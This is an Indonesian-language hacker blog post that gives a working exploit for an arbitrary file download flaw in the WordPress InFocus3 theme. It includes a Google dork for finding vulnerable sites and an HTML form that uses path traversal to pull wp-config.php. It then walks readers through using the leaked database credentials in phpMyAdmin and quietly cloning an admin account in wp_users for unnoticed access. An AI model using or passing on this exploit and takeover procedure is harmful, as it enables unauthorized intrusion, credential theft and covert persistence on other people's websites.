Wordpress Infocus3 Theme Arbitrary File Download Vulnerability

N45HT - ok saya. ya saya. yang jarang post dan sekarang mau ngepost. binggung mau post apa. baru pengen iseng-iseng ngepost aja :'v
ok langsung saja
 
 *salah satu karya saya :D

  •  Dork google 
Inurl:/wp-content/themes/infocus3/
 kembangin lagi ya say :*
  • Exploit (CSRF)
 <html>
<body>
<form action="www.target-mu.com/wp-content/themes/infocus3/lib/scripts/dl-skin.php" method="POST">

<b>File</b>:<input type="text" name="_mysite_download_skin" value="../../../../../wp-config.php"<br>


<input type="submit" value=Download>
<i>dork: inurl:/wp-content/themes/infocus3</i>
</form>
</body>

hmm.. inti dari poc ini. bisa dapet wp-config.php dari wordpress dan dapet user pass MySQL saja :'D  dan di akses pake phpMyAdmin. mungkin ga semua begitu. lanjut...


tinggal sambungin host bd. masukin user pass. korek korek cari wp_users. terserah mau di clone/copy atau diedit.



saranku. mending di clone. admin mungkin ga akan peka kalo ada 1 admin tambahan. (iya ga peka kyk kamu :'v)



langsung ke www.target-mu.com/wp-login.php

kereject? (kau kurang tampan xD ) nanti mungkin ku akan buat tutornya. lagi nyari-nyari caranya :')
 kebetulan saia kgk dapet site. emang saia itu (kurang) tampan B)

itu saja yang bisa saia sampaikan.. maap kalo ada salah kata.
koreksi ya.. kalo ada yang salah. komen dibawah aja :D

Thanks ya udah baca. semoga bermanfaat ^-^
 "Kembangkan - Kembangkan - Dan Kembangkan. Mungkin suatu hari nanti Hal yang mustahil akan berubah" -./Mr.Blank007
^asoelu PengQuotes :'v

 Thanks To : SCYTHE404_LOL - ShinChan - siluman.nanas - FRU_403 and All Members N45HT

1 comments:


EmoticonEmoticon